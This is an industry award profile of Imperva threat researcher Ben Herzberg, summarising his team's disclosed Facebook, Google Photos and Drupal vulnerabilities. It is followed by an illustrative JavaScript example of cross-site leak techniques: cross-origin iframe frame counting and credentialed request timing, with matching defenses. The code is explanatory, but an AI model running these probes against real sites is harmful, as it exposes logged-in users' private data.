Ben Herzberg
Director of Threat Research, Imperva

Why Nominated: Under Ben Herzberg’s leadership, Imperva’s threat research team has uncovered key vulnerabilities in Facebook, Google Photos, Drupal and other online services and platforms.

Profile: Herzberg and his Imperva research team are charged with identifying and evaluating software flaws that undermine application and data security. In November 2018, Imperva disclosed a significant Facebook vulnerability that could have allowed attackers to extract private information about users and their contacts – including their likes, location and interests – by manipulating the graph search function to craft malicious search queries. The technique worked by abusing the cross-origin behavior of iframes: a page on an attacker’s site can embed a cross-origin Facebook search page and still observe certain properties of the embedded frame, which Imperva described as an entirely new attack vector at the time of discovery. Then, in March 2019, Herzberg and company found that the same technique could also be leveraged to find out exactly who people were conversing with on Facebook Messenger. Facebook ultimately fixed both vulnerabilities.

Under Herzberg, Imperva also pinpointed a vulnerability in Google Photos that allowed attackers to track users’ locations via side-channel attacks. Essentially, the service’s search endpoint was vulnerable to browser-based timing attacks: by measuring how long search queries took to complete, an attacker could infer where, when and with whom a targeted individual’s photos were taken. Google fixed this flaw as well.

Other vulnerabilities found under Herzberg’s watch include one in the Docker API that attackers had exploited as a zero-day to mine cryptocurrency, a DoS bug in Scapy, a Drupal RCE bug exploited in the wild, and combinations of the DirtyCOW and Drupalgeddon2 vulnerabilities with system misconfigurations that leave Drupal web servers exposed. The Imperva research team also recently published its “State of Web Application Vulnerabilities” report, which found that web application flaws increased in frequency by 21 percent in 2018 compared to 2017.

What colleagues say: “Ben is a tremendous threat researcher, leader and colleague who excels at every task he tackles. Not only does he have impressive problem-solving skills and technical skills, including hacking and programming, but he also has excellent interpersonal skills that make him a very strong people leader... When there is a complex problem that people ‘break’ their heads to solve, Ben can somehow think differently and find a solution that no one thought of. This outside-the-box mindset combined with his unique range of skills allows him to regularly identify critical new vulnerabilities in some of the world’s leading platforms.” – Unattributed testimonial
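The two browser side channels behind the Facebook and Google Photos findings profiled above belong to a well-known class of cross-site leaks. The following is an added illustration of that class and is not Imperva’s code or its actual payload: it shows the primitive that makes an embedded cross-origin page observable (the frame count is one of the few properties the same-origin policy lets any origin read) and the response-timing primitive, together with the inference logic an attacker page needs on top of them. The probe URLs, the assumption that a result page renders a different number of iframes than an empty one, the direction of the timing difference and the sample timings are all constructed for the example.

```javascript
// Added example (not Imperva's code): the two cross-site leak primitives
// behind the findings profiled above, plus the inference logic an attacker
// page would run on top of them. Probe URLs, the "one iframe per result"
// assumption and the sample timings below are constructed, not measured.

// ---------- Primitive 1: cross-origin iframe count ----------
// The same-origin policy blocks almost everything about a cross-origin
// iframe, but window.length (the number of child frames) is one of the
// WindowProxy properties every origin may read. If a logged-in page renders
// a different number of frames depending on the victim's data, embedding it
// leaks that difference to the embedding site.

// The delta against the frame count of a known-empty result page is the
// leaked answer to the probe query.
function frameCountLeaksMatch(observedFrames, emptyPageFrames) {
  return observedFrames > emptyPageFrames;
}

// Browser-only helper: load url in a hidden iframe and resolve with its
// frame count. Rejects outside a DOM so the file still loads under Node.
function probeFrameCount(url) {
  if (typeof document === 'undefined') {
    return Promise.reject(new Error('probeFrameCount needs a browser DOM'));
  }
  return new Promise((resolve) => {
    const frame = document.createElement('iframe');
    frame.style.display = 'none';
    frame.onload = () => {
      const count = frame.contentWindow.length; // readable cross-origin
      frame.remove();
      resolve(count);
    };
    frame.src = url;
    document.body.appendChild(frame);
  });
}

// ---------- Primitive 2: cross-origin response timing ----------
// A search endpoint that does more work when a query matches the victim's
// data answers measurably slower (or faster). The attacker cannot read the
// cross-origin response, but can time how long it takes to arrive.

function median(samples) {
  const s = [...samples].sort((a, b) => a - b);
  const mid = Math.floor(s.length / 2);
  return s.length % 2 ? s[mid] : (s[mid - 1] + s[mid]) / 2;
}

// Decide whether the probe query behaved like a hit. Single requests are
// dominated by network jitter, so the inference uses the median of repeated
// measurements and refuses to answer when the gap is inside the noise band.
// A hit is assumed to be slower here; calibrate the sign against queries
// with known answers before trusting the result.
function classifyTiming(probeMs, baselineMs, minGapMs) {
  const gap = median(probeMs) - median(baselineMs);
  if (Math.abs(gap) < minGapMs) return 'inconclusive';
  return gap > 0 ? 'match' : 'no-match';
}

// Browser-only helper: time one credentialed cross-site request. The
// response is opaque (no-cors), but the elapsed time is not.
async function timeRequest(url) {
  if (typeof fetch !== 'function' || typeof performance === 'undefined') {
    throw new Error('timeRequest needs fetch and performance.now');
  }
  const start = performance.now();
  await fetch(url, { mode: 'no-cors', credentials: 'include', cache: 'no-store' });
  return performance.now() - start;
}

// Constructed sample timings (ms) standing in for real measurements.
const SAMPLE_BASELINE_MS = [41, 39, 44, 40, 38, 43, 42];  // query known to match nothing
const SAMPLE_PROBE_MS = [71, 68, 74, 200, 70, 69, 72];    // includes one jitter outlier

if (typeof document === 'undefined') {
  // Under Node only the inference logic can run.
  console.log('frame leak:', frameCountLeaksMatch(3, 1));                          // true
  console.log('timing:', classifyTiming(SAMPLE_PROBE_MS, SAMPLE_BASELINE_MS, 10)); // match
}
```

Both primitives depend on the victim’s browser attaching the victim’s session to a request that a third-party page initiated. They are therefore defeated by the standard cross-site hardening a practitioner should check for: `X-Frame-Options` or a `Content-Security-Policy` `frame-ancestors` directive stops the page from being framed at all, so there is no frame count to read; `SameSite=Lax` or `Strict` session cookies stop the credentialed cross-site fetch, so the timing measured is that of an anonymous request; and checking the `Sec-Fetch-Site` request header lets the server reject cross-site requests to sensitive endpoints outright.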